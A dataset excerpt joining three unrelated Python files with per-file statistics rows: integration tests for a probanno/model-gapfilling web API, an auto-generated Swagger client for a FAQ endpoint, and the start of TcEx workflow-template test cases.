# 400 bad session
response = make_api_request("/probanno/list", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_api_request("/probanno/download", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result.content) == str)
assert (type(json.loads(result.content) == list))
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestModelMethods(unittest.TestCase):
def test_get_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert(response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result.content) == str)
assert(type(json.loads(result.content) == dict))
# 400 No session
response = make_api_request("/model/download", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/download", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/download", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_put(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Update Case
f = open(TEST_MODEL_FILE, 'rb')
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", PUT, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", PUT, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", PUT, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_post(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
response = make_api_request("/model", POST, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", POST, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", POST, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", POST, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_list(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 0)
# cached: populate it for our session
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model/list", GET, authorize_headers(session))
assert (type(result) == list and len(result) == 1)
# 400 No session
response = make_api_request("/model/list", GET, HEADERS)
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_gapfill(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check gap-filling
job = make_and_unpack_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert job['sid'] == session
assert job['job'] == GAPFILL_MODEL_JOB
assert job['target'] == model_id
# 400 No session
response = make_api_request("/model/gapfill", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/gapfill", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": model_id,
"fasta_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 404
# Test missing arguments
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"fasta_id": CACHED_FASTA,
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
response = make_api_request("/model/gapfill", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA,
"output_id": "my_new_model",
"template": "GramNegative"})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
class TestJobMethods(unittest.TestCase):
def test_get_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": FASTA_1})
assert response.status_code == 404
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
job = make_and_unpack_request("/job", GET, authorize_headers(session),
params={"job_id": job['jid']})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# 404 JOB not found
response = make_api_request("/job", GET, authorize_headers(session),
params={"job_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/job", GET, HEADERS,
params={"job_id": job['jid']})
# 400 bad session
response = make_api_request("/job", GET, authorize_headers(str(uuid.uuid4())),
params={"job_id": job['jid']})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_job(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 0
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
assert type(result) == list and len(result) == 1
# 400 No session
response = make_api_request("/job/list", GET, HEADERS)
# 400 bad session
response = make_api_request("/job/list", GET, authorize_headers(str(uuid.uuid4())))
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def make_api_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
"""
helper method for making a request and unpacking the JSON result
:param path: sub path of the API
:param method: HTTP method
:param headers: Associated headers
:return: HTTP result
"""
response = make_api_request(path, method, headers, params=params, files=files, data=data)
return json.loads(response.text)
def authorize_headers(session):
auth_headers = {"session": session}
auth_headers.update(HEADERS)
return auth_headers
def clear_session_values(session, clear_session=False):
make_api_request('/session/clear', GET, authorize_headers(session), params={'clear_session': clear_session})
if __name__ == '__main__':
unittest.main()
| 49.618519
| 132
| 0.542547
| 2,711
| 26,794
| 5.108816
| 0.058281
| 0.033357
| 0.063682
| 0.093718
| 0.905199
| 0.893213
| 0.882671
| 0.872058
| 0.843249
| 0.814874
| 0
| 0.019265
| 0.356834
| 26,794
| 539
| 133
| 49.710575
| 0.784425
| 0.069605
| 0
| 0.753117
| 0
| 0
| 0.095713
| 0.000888
| 0
| 0
| 0
| 0
| 0.274314
| 1
| 0.044888
| false
| 0
| 0.017456
| 0
| 0.079801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c34e10de9d4e92cd05387d30abe41d9f580ace24
| 19,911
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class FAQApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_faq_using_post(self, faq_request, **kwargs): # noqa: E501
"""Create a FAQ # noqa: E501
Create a new FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_faq_using_post(faq_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Faq faq_request: faqRequest (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_faq_using_post_with_http_info(faq_request, **kwargs) # noqa: E501
else:
(data) = self.create_faq_using_post_with_http_info(faq_request, **kwargs) # noqa: E501
return data
def create_faq_using_post_with_http_info(self, faq_request, **kwargs): # noqa: E501
"""Create a FAQ # noqa: E501
Create a new FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_faq_using_post_with_http_info(faq_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Faq faq_request: faqRequest (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['faq_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_faq_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'faq_request' is set
if ('faq_request' not in params or
params['faq_request'] is None):
raise ValueError("Missing the required parameter `faq_request` when calling `create_faq_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'faq_request' in params:
body_params = params['faq_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/faq', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Faq', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_faq_using_delete(self, faq_id, **kwargs): # noqa: E501
"""Delete a FAQ # noqa: E501
Permanently delete a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_faq_using_delete(faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str faq_id: UUID faq_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_faq_using_delete_with_http_info(faq_id, **kwargs) # noqa: E501
else:
(data) = self.delete_faq_using_delete_with_http_info(faq_id, **kwargs) # noqa: E501
return data
def delete_faq_using_delete_with_http_info(self, faq_id, **kwargs): # noqa: E501
"""Delete a FAQ # noqa: E501
Permanently delete a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_faq_using_delete_with_http_info(faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str faq_id: UUID faq_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['faq_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_faq_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'faq_id' is set
if ('faq_id' not in params or
params['faq_id'] is None):
raise ValueError("Missing the required parameter `faq_id` when calling `delete_faq_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'faq_id' in params:
path_params['faq_id'] = params['faq_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/faq/{faq_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_faq_all_using_get(self, **kwargs): # noqa: E501
"""List all FAQ # noqa: E501
Get the information for all FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_faq_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageFaq
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_faq_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_faq_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_faq_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all FAQ # noqa: E501
Get the information for all FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_faq_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageFaq
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_faq_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/faq', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageFaq', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_faq_using_get(self, faq_id, **kwargs): # noqa: E501
"""Retrieve a FAQ # noqa: E501
Retrieve the information for a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_faq_using_get(faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str faq_id: UUID faq_id (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_faq_using_get_with_http_info(faq_id, **kwargs) # noqa: E501
else:
(data) = self.get_faq_using_get_with_http_info(faq_id, **kwargs) # noqa: E501
return data
def get_faq_using_get_with_http_info(self, faq_id, **kwargs): # noqa: E501
"""Retrieve a FAQ # noqa: E501
Retrieve the information for a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_faq_using_get_with_http_info(faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str faq_id: UUID faq_id (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['faq_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_faq_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'faq_id' is set
if ('faq_id' not in params or
params['faq_id'] is None):
raise ValueError("Missing the required parameter `faq_id` when calling `get_faq_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'faq_id' in params:
path_params['faq_id'] = params['faq_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/faq/{faq_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Faq', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_faq_using_put(self, faq, faq_id, **kwargs): # noqa: E501
"""Update a FAQ # noqa: E501
Update the information for a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_faq_using_put(faq, faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Faq faq: faq (required)
:param str faq_id: UUID faq_id (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_faq_using_put_with_http_info(faq, faq_id, **kwargs) # noqa: E501
else:
(data) = self.update_faq_using_put_with_http_info(faq, faq_id, **kwargs) # noqa: E501
return data
def update_faq_using_put_with_http_info(self, faq, faq_id, **kwargs): # noqa: E501
"""Update a FAQ # noqa: E501
Update the information for a FAQ # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_faq_using_put_with_http_info(faq, faq_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Faq faq: faq (required)
:param str faq_id: UUID faq_id (required)
:return: Faq
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['faq', 'faq_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_faq_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'faq' is set
if ('faq' not in params or
params['faq'] is None):
raise ValueError("Missing the required parameter `faq` when calling `update_faq_using_put`") # noqa: E501
# verify the required parameter 'faq_id' is set
if ('faq_id' not in params or
params['faq_id'] is None):
raise ValueError("Missing the required parameter `faq_id` when calling `update_faq_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'faq_id' in params:
path_params['faq_id'] = params['faq_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'faq' in params:
body_params = params['faq']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/faq/{faq_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Faq', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.009294
| 127
| 0.597258
| 2,389
| 19,911
| 4.700293
| 0.069485
| 0.05557
| 0.022531
| 0.03206
| 0.926173
| 0.90765
| 0.889572
| 0.875056
| 0.86241
| 0.846024
| 0
| 0.018055
| 0.31013
| 19,911
| 537
| 128
| 37.078212
| 0.799432
| 0.318317
| 0
| 0.745583
| 1
| 0
| 0.168128
| 0.039176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038869
| false
| 0
| 0.014134
| 0
| 0.109541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c366b39c80d52568abc14768f9ef6b8106a73f81
| 11,732
|
py
|
Python
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 18
|
2017-01-09T22:17:49.000Z
|
2022-01-24T20:46:42.000Z
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 84
|
2017-04-11T13:47:49.000Z
|
2022-03-21T20:12:57.000Z
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 43
|
2017-01-05T20:40:26.000Z
|
2022-03-31T19:18:02.000Z
|
"""Test the TcEx Case Management Module."""
# standard library
import os
# first-party
from tcex.case_management.tql import TQL
from .cm_helpers import CMHelper, TestCaseManagement
class TestWorkflowTemplate(TestCaseManagement):
"""Test TcEx CM Workflow Template Interface."""
def setup_method(self):
"""Configure setup before all tests."""
self.cm_helper = CMHelper('workflow_template')
self.cm = self.cm_helper.cm
self.tcex = self.cm_helper.tcex
def teardown_method(self):
"""Configure teardown before all tests."""
if os.getenv('TEARDOWN_METHOD') is None:
self.cm_helper.cleanup()
def test_workflow_template_api_options(self):
"""Test filter keywords."""
super().obj_api_options()
def test_workflow_template_code_gen(self):
"""Generate code and docstring from Options methods.
This is not truly a test case, but best place to store it for now.
"""
doc_string, filter_map, filter_class = super().obj_code_gen()
assert doc_string
assert filter_map
assert filter_class
def test_workflow_template_filter_keywords(self):
"""Test filter keywords."""
super().obj_filter_keywords()
def test_workflow_template_object_properties(self):
"""Test properties."""
super().obj_properties()
def test_workflow_template_object_properties_extra(self):
"""Test properties."""
super().obj_properties_extra()
def test_workflow_template_create_by_case_id(self, request):
"""Test Workflow Template Creation"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# get workflow template from API to use in asserts
workflow_template = self.cm.workflow_template(id=workflow_template.id)
workflow_template.get()
# run assertions on returned data
assert workflow_template.description == workflow_template_data.get('description')
assert workflow_template.name == workflow_template_data.get('name')
assert workflow_template.version == workflow_template_data.get('version')
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_many(self, request):
"""Test Workflow Template Creation"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# get workflow template from API to use in asserts
for wt in self.cm.workflow_templates():
if wt.name == workflow_template_data.get('name'):
assert workflow_template.description == workflow_template_data.get('description')
assert workflow_template.version == workflow_template_data.get('version')
break
else:
assert False, f"Workflow template {workflow_template_data.get('name')} was not found."
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_single_by_id(self, request):
"""Test Workflow Template Creation"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# get workflow template from API to use in asserts
workflow_template = self.cm.workflow_template(id=workflow_template.id)
workflow_template.get(all_available_fields=True)
# run assertions on returned data
assert workflow_template.description == workflow_template_data.get('description')
assert workflow_template.name == workflow_template_data.get('name')
assert workflow_template.version == workflow_template_data.get('version')
assert workflow_template.cases
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_single_by_id_properties(self, request):
"""Test Workflow Template Creation"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template()
workflow_template.description = workflow_template_data.get('description')
workflow_template.name = workflow_template_data.get('name')
workflow_template.version = workflow_template_data.get('version')
workflow_template.submit()
# get workflow template from API to use in asserts
workflow_template = self.cm.workflow_template(id=workflow_template.id)
workflow_template.get(all_available_fields=True)
# run assertions on returned data
